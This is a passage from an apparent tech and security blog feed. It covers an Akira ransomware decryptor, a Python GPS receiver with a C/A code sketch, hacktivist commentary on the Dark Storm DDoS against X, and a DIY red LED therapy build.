The first cracking attempts were made on an RTX 3060 and proved too slow, topping out at just 60 million tests per second. Even upgrading to an RTX 3090 didn’t help much.
Eventually Nugroho turned to the cloud GPU services RunPod and Vast.ai, which provided enough power and helped confirm the effectiveness of his tool. The expert used sixteen RTX 4090s, and brute-forcing the key took about 10 hours. Depending on how many encrypted files need to be recovered, however, the process could take several days.
Still, the researcher notes that GPU specialists can clearly optimize his code, so performance can probably be improved.
Nugroho has already published his decryptor on GitHub, along with detailed instructions on how to recover encrypted Akira files.
The article Ogni tanto una gioia… anzi mezza! Scoperto un modo per decifrare Akira su server Linux originally appeared (in Italian) on il blog della sicurezza informatica.
Writing a GPS Receiver from Scratch
GPS is an incredible piece of modern technology. Not only does it allow for locating objects precisely anywhere on the planet, but it also enables the turn-by-turn directions we take for granted these days — all without needing anything more than a radio receiver and some software to decode the signals constantly being sent down from space. [Chris] took that last bit as somewhat of a challenge and set off to write a software-defined GPS receiver from the ground up.
As GPS started as a military technology, the level of precision needed for things like turn-by-turn navigation wasn’t always available to civilians. The “coarse” positioning is only capable of accuracy within a few hundred meters, so this legacy capability is the first thing that [Chris] tackles here. It is pretty fast, though, with the system able to resolve a location in 24 seconds from cold start and then displaying its information in a browser window. Everything in this build is done in Python as well, meaning that it’s a great starting point for investigating how GPS works and for building other projects from there.
The other thing that makes this project accessible is that the only other hardware needed besides a computer that runs Python is an RTL-SDR dongle. These inexpensive TV dongles ushered in a software-defined radio revolution about a decade ago when it was found that they could receive a wide array of radio signals beyond just TV.
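At the heart of any GPS receiver, Python or otherwise, is correlation against each satellite's C/A code: a 1023-chip Gold code generated from two 10-stage shift registers. That part is compact enough to sketch in full (G2 delay taps are shown for the first three PRNs only; the full table lives in the GPS interface specification):

```python
def ca_code(prn):
    """Generate the 1023-chip C/A (coarse acquisition) code for one satellite.

    Two 10-stage LFSRs, all-ones start state: G1 feeds back taps 3 and 10,
    G2 feeds back taps 2, 3, 6, 8, 9, 10. Each output chip is G1's last
    stage XORed with two PRN-specific G2 taps.
    """
    g2_taps = {1: (2, 6), 2: (3, 7), 3: (4, 8)}  # first three PRNs only
    t1, t2 = g2_taps[prn]
    g1 = [1] * 10
    g2 = [1] * 10
    chips = []
    for _ in range(1023):
        chips.append(g1[9] ^ g2[t1 - 1] ^ g2[t2 - 1])
        # shift both registers (index 0 is stage 1)
        g1 = [g1[2] ^ g1[9]] + g1[:9]
        g2 = [g2[1] ^ g2[2] ^ g2[5] ^ g2[7] ^ g2[8] ^ g2[9]] + g2[:9]
    return chips

code = ca_code(1)
print(len(code))   # 1023
print(code[:10])   # [1, 1, 0, 0, 1, 0, 0, 0, 0, 0] — octal 1440, per the spec
```

A receiver repeats this code at 1.023 Mchips/s and slides it against the sampled RF to find each satellite, which is exactly the kind of processing an RTL-SDR stream feeds into.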
Beyond Dark Storm’s Attack on X: How the Illusion of Hacktivism Reinforces the System
Dark Storm’s attack on X (formerly Twitter) was significant for several reasons.
The March 10, 2025 attack, a multi-layered DDoS carried out through a botnet and claimed by the pro-Palestinian hacktivist group Dark Storm, caused a global outage, hitting a large number of users around the world and disrupting the platform’s services. “There was (and still is) a massive cyberattack against X,” Musk wrote. “We get attacked every day, but this was done with a lot of resources. It appears to be a large, coordinated group and/or a country involved.”
X had already suffered a DDoS attack earlier, in August 2024; analyzed by the Chinese cybersecurity firm Qi An Xin XLAB, a threat-intelligence specialist based in Hong Kong, it was judged to be a targeted attack using four Mirai botnet masters.
The Dark Storm Team (DST) hacker group, created in September 2023, a few weeks before Hamas’s October 7 terrorist attack on Israel, claimed responsibility for the attack via Telegram, declaring it had taken the platform offline. The attack used a botnet of compromised devices, including IoT devices such as IP cameras and routers, to overwhelm X’s servers. Although Dark Storm claimed responsibility, some experts questioned the attribution given the complexity of DDoS attacks, which can involve traffic from many locations around the globe.
This attack underscores the importance of robust cyber defenses and the complex interplay between political motivations and profit-driven cybercrime.
But such actions, argues Jesse William McGraw on Cyber News, show how contemporary hacktivism, particularly by groups like Anonymous, is a “controlled opposition” that reacts to news cycles without strategically challenging the underlying power structures. Real change, the author suggests, requires dismantling the “puppet masters” who control global finance, governments, and social structures, rather than simply engaging in superficial conflicts such as DDoS attacks. McGraw suggests that the real threats receive no attention, and that hacktivists must begin dismantling the real knowledge-based warfare networks and focus on the deeper mechanisms of control to bring about meaningful change.
The Core Principles of Hacktivism, and the Paradox
Hacktivists, McGraw tells us, are grounded in several key principles: denouncing and exposing corruption and wrongdoing, fighting censorship and defending digital privacy, supporting marginalized and oppressed communities (crucial), and countering propaganda and disinformation (a vital task). How hacktivists act on these principles reveals their true commitment to them; at the same time, some ideologies can be distorted to serve as tools of control.
The paradox is that the pursuit of idealism can sometimes mirror the very oppression hacktivists aim to dismantle, ultimately trapping people inside the system they seek to liberate. McGraw has a personal connection to this movement: hacktivism played a fundamental role in his own hacking journey. Still, he says that had he known then what he knows now, his path would have been different.
A Source of Inspiration for Meaningful Change: the Greatest Hack of All
While Dark Storm’s attack was driven by geopolitical motives, targeting entities perceived as supporters of Israel, X is itself used by many pro-Palestinian advocates, so the attack paradoxically silenced the very voices supporting that cause. The lesson: actions meant to challenge perceived oppressors can inadvertently harm those they intend to support. Contemporary hacktivism is limited in how far it challenges real power structures, and needs more incisive actions that go beyond symbolic gestures to target the root causes of systemic problems.
“[…] the hack we have all been waiting for right now is not digital but ideological.” (Jesse William McGraw)
McGraw advises the new generation to start listening to Zack de la Rocha’s lyrics for Rage Against the Machine as a source of deep inspiration for meaningful change. True freedom means recognizing and breaking free of this ideological control, rather than engaging in superficial acts of resistance. That awareness, he argues, is the “greatest hack” of all.
The article Oltre l’attacco di Dark Storm su X: come l’illusione dell’hacktivismo rinforza il sistema originally appeared (in Italian) on il blog della sicurezza informatica.
DK 9x22: The Pot Calling the Kettle Black (Il bue dà del cornuto all’asino)
It’s dispiriting when institutions act out the same dynamics as kindergarten children…
spreaker.com/episode/dk-9x22-i…
DIY Your Own Red Light Therapy Gear
There are all kinds of expensive beauty treatments on the market — various creams, zappy lasers, and fine mists of heavily-refined chemicals. For [Ruth Amos], a $78,000 LED bed had caught her eye, and she wondered if she could recreate the same functionality on the cheap.
The concept behind [Ruth]’s build is simple enough. Rather than buy a crazy-expensive off-the-shelf beauty product, she decided to just buy equivalent functional components: a bunch of cheap red LEDs. Then, all she had to do was build these into a facemask and loungewear set to get the same supposed skin improving benefits at much lower cost.
[Ruth] started her build with a welding mask, inside which she fitted red LED strips of the correct wavelength for beneficial skin effects. She then did the same with an over-sized tracksuit, lacing it with an array of LED strips to cover as much of the body as possible. While she was unlikely to achieve the same sort of total body coverage as a full-body red light bed, and the result wasn’t particularly comfortable, her design cost a lot less: on the order of $100 or so.
Of course, you might question the light therapy itself. We’re not qualified to say whether or not red LEDs will give you better skin, but it’s not the first time we’ve seen a DIY attempt at light therapy.
youtube.com/embed/4ZCb4rtJzpo?…